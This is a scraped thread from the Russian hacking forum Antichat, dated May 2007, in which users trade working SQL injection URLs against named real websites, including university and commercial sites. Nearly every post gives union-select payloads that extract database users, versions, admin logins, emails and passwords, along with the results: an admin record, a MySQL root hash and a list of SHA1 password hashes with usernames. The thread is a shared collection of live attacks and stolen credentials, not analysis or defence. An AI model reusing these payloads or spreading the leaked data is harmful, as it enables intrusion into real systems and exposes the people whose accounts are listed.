Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
13.05.2007, 17:33
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520
Репутация:
572
|
|
sql-inj
http://www.naturmed.ru
mysql 5
смотрим таблицы
http://www.naturmed.ru/index.php?id=2&subid=-1+union+select+table_name+from+information_schema. tables+limit+24,1/*
смотрим количество таблиц
http://www.naturmed.ru/index.php?id=2&subid=-1+union+select+count(table_name)+from+information_ schema.tables/*
их всего 25, но что-то ни черта интересного среди них не нашел.
Пелевин http://pelevin.nov.ru
http://pelevin.nov.ru/inews/index.php?n=-1161008436+union+select+1,2,3,4,concat_ws(0x3a,use r(),version(),database()),6/*
Последний раз редактировалось Серенький; 13.05.2007 в 17:44..
|
|
|
14.05.2007, 03:12
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Продолжаем тему выпускников  (Предыдущие МГИМО и МФТИ) Коллекция пополняется!
Теперь НГТУ(Новочеркасск)
www.ngtu.ru
Код:
http://www.ngtu.ru/info/info.php?id=-1+ union+select+database() ,user(),version(),4,5 ,6,7,8,9,10,11,12,13,14,15,16/*
Код:
http://www.ngtu.ru/info/info.php?id=-1+unio n+select+email,icq,passw,4,5 ,6,7,8,9,10,11,12,13,14,15,16+from+users/*
Все стандартно аськи, почта, пароли (в открытом виде). Пользователей 4055!
Последний раз редактировалось [53x]Shadow; 14.05.2007 в 17:39..
|
|
|
|
14.05.2007, 03:30
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508
Репутация:
1745
|
|
___[53x]Shadow
Код:
http://www.ngtu.ru/info/info.php?id=-1+union+select+username,user_password,user_icq,user_email,5,6,7,8,9,10,11,12,13,14,15,16+from+phpbb_users/*
|
|
|
|
14.05.2007, 19:56
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Коллекция выпускников;)
МИФИ
www.mephi1996.ru
Код:
http://www.mephi1996.ru/news.php?id=-1+union+select+1 ,user(), 3,version(),5,database()/*
user: tyurin@192.168.0.1
version: 4.0.27
database: tyurin
Нашел еще таблицу users, правда похоже права на select нет 
|
|
|
|
14.05.2007, 22:00
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
Код:
http://www.fof.ru/model.php?id=1+and+1=-1+union+select+1,2,3,null,concat(user,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+mysql.user/*
root:51aa86276d773238: 66j89 |
|
|
|
14.05.2007, 23:56
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520
Репутация:
572
|
|
sql_not-finished
http://www.progz.ru/
http://www.progz.ru/articles.php?issue=-5+union+select+1,2,3,name,5,6,7,8,9,0+from+users/*
http://ecoportal.ru/
http://ecoportal.ru/conf.php?id_conf=-734+union+select+1,2,3,4,concat_ws(0x3a,user(),ver sion(),database()),6,7,8,9,0,1,2,3,4,5,6,7,8,9+fro m+user/*
http://www.prokredo.ru/ mysql 5
http://www.prokredo.ru/collegefaculty.php?id=-16%20union%20select%201,concat_ws(0x3a,id,login,pa ssword,email,name,priv),3,4,5,6,7,8,9,0,1,2,3,4+fr om+kredo_admins+limit+0,1/*
1:mooncat:sql:atarskov@ipsoft.ru:Andrey Tarskov:1
|
|
|
|
15.05.2007, 07:21
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508
Репутация:
1745
|
|
Код:
http://www.acconcept.ru/news/news.php?id=-124+union+select+1,passwd,3,4,membername,6,7,8+from+smf_members/*
Код:
d286012284d40b859c81b773c260ea4d03821c1c:Natali
53f6dbb9fd0bb1e45bdb114ffdeb5167bec445d1:mofa
be1e6dcf9cd70f318bad866c521bc3bb8750889d:Rust
924e378db9cb2016fcb0e813ce6bcc735cc3461b:Fadin Denis
a119561acfc07337fdf05ce695343532c011df58:Alexander.A.Sorokin
52a4a8123268ee014ce79b8e7cb30e4f70918858:SFU
e93b7fe16991598e7bc523fba140adce6ffcb303:KamV
156da86923db93bf020958f39991fbd3b73d490c:Алексей Целищев
c960e53946d1c4ea02c5516c82d20d0e52e6999a:reduhin
824ef2d6d0aaf1eb500fdfb4e5aa7c1673ca7895:Андрей
a3497dbf28bb4a05e88feea07efed24b150fc638:NIKITA
0af4ae9b26fb793e93ca52f9735fe4aae9cb1931:елисеенко
a01249b67aa2af18b39cf1c6513b8f621ecf63c2:Кучкаров
c78840fd55285ff4d96d8f15016fd2de6ef9b717:DRIGGER
660b797b6e8d6ebf4e7e483069b973c5ba564d3a:lzanuda
a13d103e2ddbdfeb417c3843c55d2aca7d7adb4c:синичка
Napalmed -
Код:
http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3/*
admins/users - еще есть форум, походу самописный... |
|
|
|
15.05.2007, 15:06
|
|
Новичок
Регистрация: 16.02.2006
Сообщений: 24
Провел на форуме:
94166
Репутация:
14
|
|
Чёт я никак не пойму вродибы подобрал а уязвимость не проявляется !
http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,2,3/*
|
|
|
|
15.05.2007, 15:22
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Mssql
Во моя первая на MSSQL
eres.geneseo.edu
Код:
http://eres.geneseo.edu/library/research/metajournalsearch.asp?lettersearch=b'+or+1=@ @version- -
Имя БД: Serials
Имя пользователя: Serials
Версия: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
Находим все таблицы:
Код:
http://eres.geneseo.edu/library/research/metajournalsearch.asp?lettersearch=b'+or+ 1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('VALID_SUBJECT_CODES','dtproperties','eJournals','Item_Subject_Linker','LIBRARY_COMPLETENESS','LIBRARY_INDEX','LIBRARY_LOCATION','LIBRARY_PUBLICATION','LIBRARY_REORDER','LIBRARY_STATUS','LIBRARY_SUBJECT','LIBRARY_TITLE','pJournals','Sfx_e_journals','sJournals','Subject_Codes','sysconstraints','syssegments','VALID_BUILDING_CODES','VALID_COLLECTION_CODES','VALID_INDEX_CODES'))- -
Интересных таблиц не увидел, по этому для примера
Столбцы таблицы eJournals
Код:
http://eres.geneseo.edu/library/research/metajournalsearch.asp?lettersearch=b'+or+ 1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='eJournals'+AND+COLUMN_NAME+NOT+IN+('ID','Location','Title','Dates','Database','Building','Collection','Volumes_Held','Free'))- -
|
|
|
|
15.05.2007, 16:11
|
|
Новичок
Регистрация: 16.02.2006
Сообщений: 24
Провел на форуме:
94166
Репутация:
14
|
|
хороший сайт =)
http://apelsinclub.ru/show.php?event=-403+union+select+1,2,3,VERSION(),5,6,7/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?362715){kind=avatar}
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?363104){kind=avatar}
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?363564){kind=avatar}
Похожие темы
Линейный вид
